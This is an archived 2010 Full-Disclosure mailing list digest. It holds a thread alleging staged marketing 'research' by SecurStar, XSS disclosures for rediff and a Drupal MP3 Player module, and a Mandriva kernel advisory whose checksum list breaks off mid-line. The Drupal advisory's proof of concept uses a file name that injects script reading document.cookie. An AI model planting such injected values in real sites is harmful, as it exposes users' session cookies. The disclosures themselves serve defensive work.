From lists at infosecurity.ch Mon Feb 1 00:04:47 2010 From: lists at infosecurity.ch (Fabio Pietrosanti (naif)) Date: Mon, 1 Feb 2010 01:04:47 +0100 Subject: [Full-disclosure] Evidence of fake security research from SecurStar GmbH In-Reply-To: References: <5AF06D84-37B8-4113-B5CB-E4F82157CE71@infosecurity.ch> Message-ID: <0A36C431-FDD7-4E36-B036-22459AD4C6BB@infosecurity.ch> Infosecurity Magazine was cheated: InfoSecurity Magazine The Register was cheated: The Register Network World was cheated: Network World And a if you read on google there was a lot of media coverage. They was very smart to arrange that Psycological operations, unfortunately for them they was discovered not being able to preserve their anonymity behind the anonymous http://infosecurityguard.com website . Fabio Pietrosanti (naif) On 01/feb/10, at 00:48, Thor (Hammer of God) wrote: > What journalists, bloggers, and security magazines? I?ve not seen > anything about these people anywhere. > > > > t > > > > From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk > ] On Behalf Of Fabio Pietrosanti > Sent: Sunday, January 31, 2010 3:41 PM > To: full-disclosure > Subject: [Full-disclosure] Evidence of fake security research from > SecurStar GmbH > > > > Ok, now we have the evidence: The research was a fake security > research arranged for a marketing campaign. > > > > They was able cheat most journalists, bloggers and security magazines. > > > > I don't remember in all my life a so irresponsible and dirty > marketing trick in the security world, abusing of hackers reputations. > > > > Read below, they leaked the IP of the anonymous author of http://infosecurityguard.com > and it's confirmed that it come from SecurStar GmbH office: > > > > Evidence that infosecurityguard.com/notrax is SecurStar GmbH ? A > fake independent research on voice crypto (by me) > > Dishonest security: The SecurStart GmbH case (by me) > > Debunking Infosecurityguard identity from Matteo Flora . > > > > It's hilarious and unbelievable that a security company had done > something like this. > > > > Fabio Pietrosanti (naif) > > > > On 30/gen/10, at 15:51, Fabio Pietrosanti (naif) wrote: > > > > > Hi all, > > i don't know how many of you have read about the analysis done on http://infosecurityguard.com > . > > I have made a detailed analysis of their initiative and the result > is that: > > - it's most probably a camouflage marketing initiative and not a > independent security research > - they consider a security context where local device has been > compromised (no software can be secured in that case) > - they do not consider cryptographic security arguments > > Below my analysis on this (read it carefully): > > http://infosecurity.ch > > Maybe it's interesting, maybe not, but for sure some facts are very > relevant! > > Fabio Pietrosanti (naif) > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100201/5e9e4a3a/attachment-0001.html From Thor at hammerofgod.com Mon Feb 1 00:15:33 2010 From: Thor at hammerofgod.com (Thor (Hammer of God)) Date: Mon, 1 Feb 2010 00:15:33 +0000 Subject: [Full-disclosure] Evidence of fake security research from SecurStar GmbH In-Reply-To: <0A36C431-FDD7-4E36-B036-22459AD4C6BB@infosecurity.ch> References: <5AF06D84-37B8-4113-B5CB-E4F82157CE71@infosecurity.ch> <0A36C431-FDD7-4E36-B036-22459AD4C6BB@infosecurity.ch> Message-ID: Ah, 3 copy and paste articles. OK. t From: Fabio Pietrosanti (naif) [mailto:lists at infosecurity.ch] Sent: Sunday, January 31, 2010 4:05 PM To: Thor (Hammer of God) Cc: full-disclosure Subject: Re: [Full-disclosure] Evidence of fake security research from SecurStar GmbH Infosecurity Magazine was cheated: InfoSecurity Magazine The Register was cheated: The Register Network World was cheated: Network World And a if you read on google there was a lot of media coverage. They was very smart to arrange that Psycological operations, unfortunately for them they was discovered not being able to preserve their anonymity behind the anonymous http://infosecurityguard.com website . Fabio Pietrosanti (naif) On 01/feb/10, at 00:48, Thor (Hammer of God) wrote: What journalists, bloggers, and security magazines? I've not seen anything about these people anywhere. t From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Fabio Pietrosanti Sent: Sunday, January 31, 2010 3:41 PM To: full-disclosure Subject: [Full-disclosure] Evidence of fake security research from SecurStar GmbH Ok, now we have the evidence: The research was a fake security research arranged for a marketing campaign. They was able cheat most journalists, bloggers and security magazines. I don't remember in all my life a so irresponsible and dirty marketing trick in the security world, abusing of hackers reputations. Read below, they leaked the IP of the anonymous author of http://infosecurityguard.com and it's confirmed that it come from SecurStar GmbH office: Evidence that infosecurityguard.com/notrax is SecurStar GmbH - A fake independent research on voice crypto (by me) Dishonest security: The SecurStart GmbH case (by me) Debunking Infosecurityguard identity from Matteo Flora . It's hilarious and unbelievable that a security company had done something like this. Fabio Pietrosanti (naif) On 30/gen/10, at 15:51, Fabio Pietrosanti (naif) wrote: Hi all, i don't know how many of you have read about the analysis done on http://infosecurityguard.com . I have made a detailed analysis of their initiative and the result is that: - it's most probably a camouflage marketing initiative and not a independent security research - they consider a security context where local device has been compromised (no software can be secured in that case) - they do not consider cryptographic security arguments Below my analysis on this (read it carefully): http://infosecurity.ch Maybe it's interesting, maybe not, but for sure some facts are very relevant! Fabio Pietrosanti (naif) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100201/b3e1a1b1/attachment.html From skg102 at gmail.com Mon Feb 1 15:39:29 2010 From: skg102 at gmail.com (rockey killer) Date: Mon, 1 Feb 2010 21:09:29 +0530 Subject: [Full-disclosure] Persistant XSS Vulnerability in rediff Message-ID: *About Redif*f Rediff.com (Nasdaq: REDF) is one of the premier worldwide online providers of news, information, communication, entertainment and shopping services. Rediff.com provides a platform for Indians worldwide to connect with one another online. Rediff.com is committed to offering a personalized and a secure surfing and shopping environment. Rediff.com additionally offers the Indian American community one of the oldest and largest Indian weekly newspapers, India Abroad. Founded in 1996, Rediff.com is headquartered in Mumbai, India with offices in New Delhi, Bangalore, Chennai, Hyderabad and New York, USA. Mission In The Internet Space To provide world-class online consumer service offerings to Indians worldwide. * * *Vulnerability* Persistant XSS Vulnerability in Subject field of rediff Vulnerability Reported on : Sat, Jan 23, 2010 at 1:23 AM But they din't even cared to respond back . * * *Credits* This Vulnerability was discovered and reported by w4rl0ck.d0wn and Rockey Killer of h4ck3r crew * * *POC* http://h4ck3r.in/Reported%20Vulnerabilities/rediff/ Rockey Killer h4ck3r Crew -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100201/99c16693/attachment.html From martybarbella at gmail.com Mon Feb 1 16:59:59 2010 From: martybarbella at gmail.com (Martin Barbella) Date: Mon, 1 Feb 2010 11:59:59 -0500 Subject: [Full-disclosure] XSS vulnerability in Drupal's MP3 Player contributed module (version 6.x-1.0-beta1) Message-ID: <1e85415f1002010859x1b073fb7q38390c0c417ae811@mail.gmail.com> XSS vulnerability in Drupal's MP3 Player contributed module (version 6.x-1.0-beta1) Discovered by Martin Barbella Description of Vulnerability: ----------------------------- Drupal is a free software package that allows an individual or a community of users to easily publish, manage and organize a wide variety of content on a website. (From: http://drupal.org/about) The MP3 Player module allows users to use the WordPress Audio Player in Drupal. The name of the mp3 file is not properly sanitized when the javascript to create the audio player is generated, resulting in a cross site scripting vulnerability. The module also fails to sanitize various inputs on the MP3 player administration page. In the cases where the user is prompted for 6 digit hex values to use as colors for the player, it will only check that the value is 6 characters long, and will not verify that it is hexadecimal, but as this is both difficult to exploit, and requires that the user can administer the MP3 player module, the rest of this report will only focus on the previous vulnerability. Systems affected: ----------------- This has been confirmed in MP3 Player 6.x-1.0-beta1. Other versions may also be affected. Impact: ------- Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. (From OWASP: http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29) Mitigating factors: ------------------- A user must have permission to create nodes of a type that use the audio player. Proof of concept: ----------------- 1. Install the MP3 Player module and its dependencies. 2. Create a new content type with a file field that accepts mp3s. 3. Make sure that MP3 Player will be used with the field that you have created. 4. Create a file named "+alert(document.cookie)+".mp3 5. Create a node with the new content type, and upload this file. 6. Note that an alert box will be displayed when viewing this node. Timeline: --------- 2010-01-14 - Drupal Security notified 2010-02-01 - Still no response from Drupal Security 2010-02-01 - Public disclosure From security at mandriva.com Mon Feb 1 17:58:00 2010 From: security at mandriva.com (security at mandriva.com) Date: Mon, 01 Feb 2010 18:58:00 +0100 Subject: [Full-disclosure] [ MDVSA-2010:030 ] kernel Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2010:030 http://www.mandriva.com/security/ _______________________________________________________________________ Package : kernel Date : January 1, 2009 Affected: 2010.0 _______________________________________________________________________ Problem Description: Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel: Array index error in the gdth_read_event function in drivers/scsi/gdth.c in the Linux kernel before 2.6.32-rc8 allows local users to cause a denial of service or possibly gain privileges via a negative event index in an IOCTL request. (CVE-2009-3080) The collect_rx_frame function in drivers/isdn/hisax/hfc_usb.c in the Linux kernel before 2.6.32-rc7 allows attackers to have an unspecified impact via a crafted HDLC packet that arrives over ISDN and triggers a buffer under-read. (CVE-2009-4005) An issue was discovered in 2.6.32.x kernels, which sets unsecure permission for devtmpfs file system by default. (CVE-2010-0299) Additionally, it was added support for Atheros AR2427 Wireless Network Adapter. To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4005 https://qa.mandriva.com/55826 https://qa.mandriva.com/55823 _______________________________________________________________________ Updated Packages: Mandriva Linux 2010.0: 48e8044a0c5b231f41688161a6b0bd74 2010.0/i586/broadcom-wl-kernel-2.6.31.12-desktop-1mnb-5.10.91.9-2mdv2010.0.i586.rpm 9c4bbabb10baefb0a4a0f7cc3ee7fc75 2010.0/i586/broadcom-wl-kernel-2.6.31.12-desktop586-1mnb-5.10.91.9-2mdv2010.0.i586.rpm 9e87d833b3c2248d1cbebcc95bb0e071 2010.0/i586/broadcom-wl-kernel-2.6.31.12-server-1mnb-5.10.91.9-2mdv2010.0.i586.rpm d71381ec4243842f78d6e6bd9393ff4f 2010.0/i586/broadcom-wl-kernel-desktop586-latest-5.10.91.9-1.20100126.2mdv2010.0.i586.rpm 1e22f2bfbd18aca9694c7cafbd6137cc 2010.0/i586/broadcom-wl-kernel-desktop-latest-5.10.91.9-1.20100126.2mdv2010.0.i586.rpm 4aa65097cb0141f2dc9789843e8f49a8 2010.0/i586/broadcom-wl-kernel-server-latest-5.10.91.9-1.20100126.2mdv2010.0.i586.rpm fe9efd6cb0df267874f7b0c33005acb6 2010.0/i586/em8300-kernel-2.6.31.12-desktop-1mnb-0.17.4-1mdv2010.0.i586.rpm 0260216e7c8789979e4cd06bbf677675 2010.0/i586/em8300-kernel-2.6.31.12-desktop586-1mnb-0.17.4-1mdv2010.0.i586.rpm 29b0aee11196d91171f4a59c295aa96a 2010.0/i586/em8300-kernel-2.6.31.12-server-1mnb-0.17.4-1mdv2010.0.i586.rpm 96ea57b60cabb14d80ebbf4789242638 2010.0/i586/em8300-kernel-desktop586-latest-0.17.4-1.20100126.1mdv2010.0.i586.rpm d17442fe8a2820eb28350465a6874b9e 2010.0/i586/em8300-kernel-desktop-latest-0.17.4-1.20100126.1mdv2010.0.i586.rpm 4be7d29df49614e41317287da3f26962 2010.0/i586/em8300-kernel-server-latest-0.17.4-1.20100126.1mdv2010.0.i586.rpm d924fe5e7653e94e6a722ecb0da10e6f 2010.0/i586/fglrx-kernel-2.6.31.12-desktop-1mnb-8.650-1mdv2010.0.i586.rpm 05e8892e5c754772c6fc6f5af2d9428b 2010.0/i586/fglrx-kernel-2.6.31.12-desktop586-1mnb-8.650-1mdv2010.0.i586.rpm 204ffbe2b99355d4665fe95e33def557 2010.0/i586/fglrx-kernel-2.6.31.12-server-1mnb-8.650-1mdv2010.0.i586.rpm d2dd8f6267ac7c7fa4dce440122d86a8 2010.0/i586/fglrx-kernel-desktop586-latest-8.650-1.20100126.1mdv2010.0.i586.rpm f7cec28c2985b7a193b711f09e22e523 2010.0/i586/fglrx-kernel-desktop-latest-8.650-1.20100126.1mdv2010.0.i586.rpm 58ef3c535205210ce6c616d2645bea8e 2010.0/i586/fglrx-kernel-server-latest-8.650-1.20100126.1mdv2010.0.i586.rpm 9913e4449d302cfaab7d21c02121f2b4 2010.0/i586/hcfpcimodem-kernel-2.6.31.12-desktop-1mnb-1.19-1mdv2010.0.i586.rpm b3d3aea2c817d82c6272d5fe58202fb2 2010.0/i586/hcfpcimodem-kernel-2.6.31.12-desktop586-1mnb-1.19-1mdv2010.0.i586.rpm 065323bfd77adca3bfed3427c59801cf 2010.0/i586/hcfpcimodem-kernel-2.6.31.12-server-1mnb-1.19-1mdv2010.0.i586.rpm 6eca4ca643e0339236b32c6f04faa3d2 2010.0/i586/hcfpcimodem-kernel-desktop586-latest-1.19-1.20100126.1mdv2010.0.i586.rpm 9a0e4c3927a71b92e501ab72d5fe3f6b 2010.0/i586/hcfpcimodem-kernel-desktop-latest-1.19-1.20100126.1mdv2010.0.i586.rpm 11521178fc16acf1c89be913f5fcae51 2010.0/i586/hcfpcimodem-kernel-server-latest-1.19-1.20100126.1mdv2010.0.i586.rpm d1e53bc3d9d5641fbebcade1b0e5c245 2010.0/i586/hsfmodem-kernel-2.6.31.12-desktop-1mnb-7.80.02.05-1mdv2010.0.i586.rpm 6799ee6b044c950d5a4dc9fdda5a6557 2010.0/i586/hsfmodem-kernel-2.6.31.12-desktop586-1mnb-7.80.02.05-1mdv2010.0.i586.rpm c1d31bf9854368e58fc2ff5dba8ed1a3 2010.0/i586/hsfmodem-kernel-2.6.31.12-server-1mnb-7.80.02.05-1mdv2010.0.i586.rpm 10c0159c3017bf11b2ac03df623e8d0d 2010.0/i586/hsfmodem-kernel-desktop586-latest-7.80.02.05-1.20100126.1mdv2010.0.i586.rpm e554b1b4095708f447db80ea3578dfc2 2010.0/i586/hsfmodem-kernel-desktop-latest-7.80.02.05-1.20100126.1mdv2010.0.i586.rpm 612794fa6f3bfe8a3b1ee40051bb15d5 2010.0/i586/hsfmodem-kernel-server-latest-7.80.02.05-1.20100126.1mdv2010.0.i586.rpm 6b62d4a045599ed5cfaf6f1177d0ec36 2010.0/i586/kernel-2.6.31.12-1mnb-1-1mnb2.i586.rpm 63eade20d81d2ebc5de69d75cd408e8f 2010.0/i586/kernel-desktop-2.6.31.12-1mnb-1-1mnb2.i586.rpm b46877e1e40868601c0bf6eb05c410d2 2010.0/i586/kernel-desktop586-2.6.31.12-1mnb-1-1mnb2.i586.rpm 38c30ec1f5ea8accc8f99838d82d6bcc 2010.0/i586/kernel-desktop586-devel-2.6.31.12-1mnb-1-1mnb2.i586.rpm 2a2522d9c0c4f17b4570589e4c1c15d0 2010.0/i586/kernel-desktop586-devel-latest-2.6.31.12-1mnb2.i586.rpm 1674756dab5931b6c4860947122904ee 2010.0/i586/kernel-desktop586-latest-2.6.31.12-1mnb2.i586.rpm 7462601262a9dad292518358c2adf047 2010.0/i586/kernel-desktop-devel-2.6.31.12-1mnb-1-1mnb2.i586.rpm adbefbe928d48c731549f54390d30ad4 2010.0/i586/kernel-desktop-devel-latest-2.6.31.12-1mnb2.i586.rpm b6b5f972efc02b3d19b036e3418363e1 2010.0/i586/kernel-desktop-latest-2.6.31.12-1mnb2.i586.rpm 5ce75ccc565cfb1f69bd4adafd9dc589 2010.0/i586/kernel-doc-2.6.31.12-1mnb2.i586.rpm b146d0e24b81209b47f797c3071ac4d5 2010.0/i586/kernel-server-2.6.31.12-1mnb-1-1mnb2.i586.rpm 840a19e9cc644f9fe9de4067a46ed1d4 2010.0/i586/kernel-server-devel-2.6.31.12-1mnb-1-1mnb2.i586.rpm acf73c622b1faba8b996d06c45ae9b8a 2010.0/i586/kernel-server-devel-latest-2.6.31.12-1mnb2.i586.rpm 29e3bcffe720731b2299c3075881515b 2010.0/i586/kernel-server-latest-2.6.31.12-1mnb2.i586.rpm 0db8faac72252c86def9e07d3c615409 2010.0/i586/kernel-source-2.6.31.12-1mnb-1-1mnb2.i586.rpm 8ff232221bc621ec2fff4fc8d98084db 2010.0/i586/kernel-source-latest-2.6.31.12-1mnb2.i586.rpm 2be65cf47eab0ed99430617895bf3bd7 2010.0/i586/libafs-kernel-2.6.31.12-desktop-1mnb-1.4.11-2mdv2010.0.i586.rpm fc5b820b3a26f5cec05b126df13ebe5a 2010.0/i586/libafs-kernel-2.6.31.12-desktop586-1mnb-1.4.11-2mdv2010.0.i586.rpm ba18bf2e462ba0646e02a55df7d878e4 2010.0/i586/libafs-kernel-2.6.31.12-server-1mnb-1.4.11-2mdv2010.0.i586.rpm ada6dfed7fb787ac301634cdc4759140 2010.0/i586/libafs-kernel-desktop586-latest-1.4.11-1.20100126.2mdv2010.0.i586.rpm f330e298fc6f14c7b2a5ece6870c6c31 2010.0/i586/libafs-kernel-desktop-latest-1.4.11-1.20100126.2mdv2010.0.i586.rpm 797e643a68113a8f92013c18b6182b57 2010.0/i586/libafs-kernel-server-latest-1.4.11-1.20100126.2mdv2010.0.i586.rpm c67a17eada3f36347b9308f0ab2e3e02 2010.0/i586/lirc-kernel-2.6.31.12-desktop-1mnb-0.8.6-2mdv2010.0.i586.rpm 8e971b4a90c79922c4d447daf3b08e1e 2010.0/i586/lirc-kernel-2.6.31.12-desktop586-1mnb-0.8.6-2mdv2010.0.i586.rpm 1df00d616c766dc55514303ab2dea5a0 2010.0/i586/lirc-kernel-2.6.31.12-server-1mnb-0.8.6-2mdv2010.0.i586.rpm c26c8e9e01f6f8c22e108b6093afff94 2010.0/i586/lirc-kernel-desktop586-latest-0.8.6-1.20100126.2mdv2010.0.i586.rpm eb106f3e006d48ced6dee925e8adf36f 2010.0/i586/lirc-kernel-desktop-latest-0.8.6-1.20100126.2mdv2010.0.i586.rpm 08a591dea493e00082f26f341bcac7e3 2010.0/i586/lirc-kernel-server-latest-0.8.6-1.20100126.2mdv2010.0.i586.rpm 6cad681db8e4a8b87c9727752b1bc39b 2010.0/i586/lzma-kernel-2.6.31.12-desktop-1mnb-4.43-28mdv2010.0.i586.rpm a447e07c32e81d176967ffb036694d8d 2010.0/i586/lzma-kernel-2.6.31.12-desktop586-1mnb-4.43-28mdv2010.0.i586.rpm 3fd1714f958b2d4e7f7e4a320b70a9fa 2010.0/i586/lzma-kernel-2.6.31.12-server-1mnb-4.43-28mdv2010.0.i586.rpm 1e6dcfb7547dae0a7347ae61f1ca1552 2010.0/i586/lzma-kernel-desktop586-latest-4.43-1.20100126.28mdv2010.0.i586.rpm af5815d4a22f7eae68d29358f0921f45 2010.0/i586/lzma-kernel-desktop-latest-4.43-1.20100126.28mdv2010.0.i586.rpm b4e29c1bc903525f39d288b5afbd858f 2010.0/i586/lzma-kernel-server-latest-4.43-1.20100126.28mdv2010.0.i586.rpm eb7b3b743e0dc2c2886b8917eef935b6 2010.0/i586/madwifi-kernel-2.6.31.12-desktop-1mnb-0.9.4-4.r4068mdv2010.0.i586.rpm 95b9f69631a66290aab30509dfae73fd 2010.0/i586/madwifi-kernel-2.6.31.12-desktop586-1mnb-0.9.4-4.r4068mdv2010.0.i586.rpm 0d6d6bc33569c5a50adb9b546f676f31 2010.0/i586/madwifi-kernel-2.6.31.12-server-1mnb-0.9.4-4.r4068mdv2010.0.i586.rpm 2569af719046fe5a191d8130604dcfd7 2010.0/i586/madwifi-kernel-desktop586-latest-0.9.4-1.20100126.4.r4068mdv2010.0.i586.rpm e3d29c1445d4c251cb5ad29859c9d190 2010.0/i586/madwifi-kernel-desktop-latest-0.9.4-1.20100126.4.r4068mdv2010.0.i586.rpm f91c5f845aae33f29f7bd094a20ddc82 2010.0/i586/madwifi-kernel-server-latest-0.9.4-1.20100126.4.r4068mdv2010.0.i586.rpm 2c596954624f67d5db3ad25c6eaf4188 2010.0/i586/nvidia173-kernel-2.6.31.12-desktop-1mnb-173.14.20-7mdv2010.0.i586.rpm 035f44ea385ca295cbe8c472ee7e46f3 2010.0/i586/nvidia173-kernel-2.6.31.12-desktop586-1mnb-173.14.20-7mdv2010.0.i586.rpm 6e808ffd593b1ee8251f5e99877735f1 2010.0/i586/nvidia173-kernel-2.6.31.12-server-1mnb-173.14.20-7mdv2010.0.i586.rpm b0b9bc30bb4d43e2317f91724b494fad 2010.0/i586/nvidia173-kernel-desktop586-latest-173.14.20-1.20100126.7mdv2010.0.i586.rpm b0639da6258922ce41a1346e81e5189c 2010.0/i586/nvidia173-kernel-desktop-latest-173.14.20-1.20100126.7mdv2010.0.i586.rpm 0340266660b40ea7d372b96324f50ef2 2010.0/i586/nvidia173-kernel-server-latest-173.14.20-1.20100126.7mdv2010.0.i586.rpm 3d8a86a30ce5d68988e67a428b1e2306 2010.0/i586/nvidia96xx-kernel-2.6.31.12-desktop-1mnb-96.43.13-7mdv2010.0.i586.rpm 3e9246d5a7ddf178eddcd2a3a1e5e3ec 2010.0/i586/nvidia96xx-kernel-2.6.31.12-desktop586-1mnb-96.43.13-7mdv2010.0.i586.rpm a1c4b26fd590fc540f3def261326b0df 2010.0/i586/nvidia96xx-kernel-2.6.31.12-server-1mnb-96.43.13-7mdv2010.0.i586.rpm f8adea0d18d390e2c6505609a68010b8 2010.0/i586/nvidia96xx-kernel-desktop586-latest-96.43.13-1.20100126.7mdv2010.0.i586.rpm aa7dd2d7f886b90f9d78d14362f214aa 2010.0/i586/nvidia96xx-kernel-desktop-latest-96.43.13-1.20100126.7mdv2010.0.i586.rpm b9c2d4219213581e7010b8d0df2c6cf6 2010.0/i586/nvidia96xx-kernel-server-latest-96.43.13-1.20100126.7mdv2010.0.i586.rpm 1b801a4dedd9ff2f3bfa891f2c2a22f0 2010.0/i586/nvidia-current-kernel-2.6.31.12-desktop-1mnb-185.18.36-4mdv2010.0.i586.rpm d9a1b28a7818180852df25e4759a9ba2 2010.0/i586/nvidia-current-kernel-2.6.31.12-desktop586-1mnb-185.18.36-4mdv2010.0.i586.rpm b917d3351088df0b06922a3a3c415f18 2010.0/i586/nvidia-current-kernel-2.6.31.12-server-1mnb-185.18.36-4mdv2010.0.i586.rpm 3d33bbac11cd1a5170a724ba6a9e3f22 2010.0/i586/nvidia-current-kernel-desktop586-latest-185.18.36-1.20100126.4mdv2010.0.i586.rpm d5a762bc4e2ae1f54279c4b7cd2edcef 2010.0/i586/nvidia-current-kernel-desktop-latest-185.18.36-1.20100126.4mdv2010.0.i586.rpm 9b414d82cd0b051991d9ed334eec69c3 2010.0/i586/nvidia-current-kernel-server-latest-185.18.36-1.20100126.4mdv2010.0.i586.rpm 7e937fb995c1b606b7631259c4e42cd6 2010.0/i586/slmodem-kernel-2.6.31.12-desktop-1mnb-2.9.11-0.20080817.4.1mdv2010.0.i586.rpm 0b4a2cb1c6102047d097823d3774a454 2010.0/i586/slmodem-kernel-2.6.31.12-desktop586-1mnb-2.9.11-0.20080817.4.1mdv2010.0.i586.rpm eaecf8a7a0ee1cbeba571ae3fa6da3a9 2010.0/i586/slmodem-kernel-2.6.31.12-server-1mnb-2.9.11-0.20080817.4.1mdv2010.0.i586.rpm 10f69b4fddf3a1cfda9b13f5893e2fef 2010.0/i586/slmodem-kernel-desktop586-latest-2.9.11-1.20100126.0.20080817.4.1mdv2010.0.i586.rpm 3ea96343daa2751608dd22439d6beccc 2010.0/i586/slmodem-kernel-desktop-latest-2.9.11-1.20100126.0.20080817.4.1mdv2010.0.i586.rpm 02dca4b2d92823eeb1c546f742650521 2010.0/i586/slmodem-kernel-server-latest-2.9.11-1.20100126.0.20080817.4.1mdv2010.0.i586.rpm c2ece713f640f1a80b2709ef4a0de0f3 2010.0/i586/squashfs-lzma-kernel-2.6.31.12-desktop-1mnb-3.3-11mdv2010.0.i586.rpm 51afd14144b242f933b0eca63c8564bd 2010.0/i586/squashfs-lzma-kernel-2.6.31.12-desktop586-1mnb-3.3-11mdv2010.0.i586.rpm 4ee32f44a56a342eb34fb805beba204c 2010.0/i586/squashfs-lzma-kernel-2.6.31.12-server-1mnb-3.3-11mdv2010.0.i586.rpm b1ca321e36b828b29bb960d5f20a7ff6 2010.0/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20100126.11mdv2010.0.i586.rpm 68124db03cfd4bd9f46c0a08557d6aa8 2010.0/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20100126.11mdv2010.0.i586.rpm 8b58f6694d1dd59cd67bb3e74491ae3f 2010.0/i586/squashfs-lzma-kernel-server-latest-3.3-1.20100126.11mdv2010.0.i586.rpm c82414a6ab9c41614c6551e63883b6ac 2010.0/i586/vboxadditions-kernel-2.6.31.12-desktop-1mnb-3.0.8-1mdv2010.0.i586.rpm 53a1900aeef414aba5fe873c62743091 2010.0/i586/vboxadditions-kernel-2.6.31.12-desktop586-1mnb-3.0.8-1mdv2010.0.i586.rpm 3580c8ba7ea9d27e97767c22593707f8 2010.0/i586/vboxadditions-kernel-2.6.31.12-server-1mnb-3.0.8-1mdv2010.0.i586.rpm faf0deee0340df3d3635e7c2875d957d 2010.0/i586/vboxadditions-kernel-desktop586-latest-3.0.8-1.20100126.1mdv2010.0.i586.rpm 532c54568ca213adc9256b76f13d1be2 2010.0/i586/vboxadditions-kernel-desktop-latest-3.0.8-1.20100126.1mdv2010.0.i586.rpm 5054d2b3c597faec342a57934a858d2f 2010.0/i586/vboxadditions-kernel-server-latest-3.0.8-1.20100126.1mdv2010.0.i586.rpm 6cf6c28034345afbe1f3145abccf5108 2010.0/i586/virtualbox-kernel-2.6.31.12-desktop-1mnb-3.0.8-1mdv2010.0.i586.rpm 3eb2e62c7ce83df19c3c840f0d0b68d3 2010.0/i586/virtualbox-kernel-2.6.31.12-desktop586-1mnb-3.0.8-1mdv2010.0.i586.rpm aad5b6bfb27208b9fe1c9811a3018dfd 2010.0/i586/virtualbox-kernel-2.6.31.12-server-1mnb-3.0.8-1mdv2010.0.i586.rpm f5c66708be1c02e61e99801a4dd2b43d 2010.0/i586/virtualbox-kernel-desktop586-latest-3.0.8-1.20100126.1mdv2010.0.i586.rpm c4f4fb542b6f6d2708a8093be2041cb1 2010.0/i586/virtualbox-kernel-desktop-latest-3.0.8-1.20100126.1mdv2010.0.i586.rpm 575a14a34073e09b703a5a59aaa02238 2010.0/i586/virtualbox-kernel-server-latest-3.0.8-1.20100126.1mdv2010.0.i586.rpm 5d63643128ca3dc687f94963401456f7 2010.0/i586/vpnclient-kernel-2.6.31.12-desktop-1mnb-4.8.02.0030-1mdv2010.0.i586.rpm 751cd82fb4d4eecc5baded558624d93c 2010.0/i586/vpnclient-kernel-2.6.31.12-desktop586-1mnb-4.8.02.0030-1mdv2010.0.i586.rpm 9bf4e2178a372992a5c9d158fb67890c 2010.0/i586/vpnclient-kernel-2.6.31.12-server-1mnb-4.8.02.0030-1mdv2010.0.i586.rpm 62305155d22108d717359e217f064062 2010.0/i586/vpnclient-kernel-desktop586-latest-4.8.02.0030-1.20100126.1mdv2010.0.i586.rpm b3cea000a07ce92fcef3779a622c8b05 2010.0/i586/vpnclient-kernel-desktop-latest-4.8.02.0030-1.20100126.1mdv2010.0.i586.rpm 6593d26ba01aae45af0bf57be9f42504 2010.0/i586/vpnclient-kernel-server-latest-4.8.02.0030-1.20100126.1mdv2010.0.i586.rpm 8184ee149bfa4606b294302d60fc46f6 2010.0/SRPMS/kernel-2.6.31.12-1mnb2.src.rpm Mandriva Linux 2010.0/X86_64: 389d3508b9ee73ffbeb135b6cbfb85c2 2010.0/x86_64/broadcom-wl-kernel-2.6.31.12-desktop-1mnb-5.10.91.9-2mdv2010.0.x86_64.rpm a8a5a926a62a97484bd0721ca6499ac1 2010.0/x86_64/broadcom-wl-kernel-2.6.31.12-server-1mnb-5.10.91.9-2mdv2010.0.x86_64.rpm 15a5987d13ae3b091e4ab4cb81aec6d3 2010.0/x86_64/broadcom-wl-kernel-desktop-latest-5.10.91.9-1.20100126.2mdv2010.0.x86_64.rpm b34fa6551be29c02586aac72d1ea9ef1 2010.0/x86_64/broadcom-wl-kernel-server-latest-5.10.91.9-1.20100126.2mdv2010.0.x86_64.rpm cef39321545d7c8b0a2b7999fc55921e 2010.0/x86_64/em8300-kernel-2.6.31.12-desktop-1mnb-0.17.4-1mdv2010.0.x86_64.rpm 275f00ddc039da32691bbfa9ab91dc51 2010.0/x86_64/em8300-kernel-2.6.31.12-server-1mnb-0.17.4-1mdv2010.0.x86_64.rpm 5a76637ada89fc136a3a51666e2da4fc 2010.0/x86_64/em8300-kernel-desktop-latest-0.17.4-1.20100126.1mdv2010.0.x86_64.rpm 6b20e778171fc82e3d8358c7e42fb56c 2010.0/x86_64/em8300-kernel-server-latest-0.17.4-1.20100126.1mdv2010.0.x86_64.rpm f6b406020aaa396d36df7c85a4b38585 2010.0/x86_64/fglrx-kernel-2.6.31.12-desktop-1mnb-8.650-1mdv2010.0.x86_64.rpm f08be8aa57688bdcce0d4982a05a283e 2010.0/x86_64/fglrx-kernel-2.6.31.12-server-1mnb-8.650-1mdv2010.0.x86_64.rpm 4b96adffe6471b07465945f66ca44103 2010.0/x86_64/fglrx-kernel-desktop-latest-8.650-1.20100126.1mdv2010.0.x86_64.rpm 6f89d2cb1796a11bfa255d5873920ed8 2010.0/x86_64/fglrx-kernel-server-latest-8.650-1.20100126.1mdv2010.0.x86_64.rpm 023c0c246ce39f8b493555c3c8b23c61 2010.0/x86_64/hsfmodem-kernel-2.6.31.12-desktop-1mnb-7.80.02.05-1mdv2010.0.x86_64.rpm 2ee504d6176e70cb674af25e298850e2 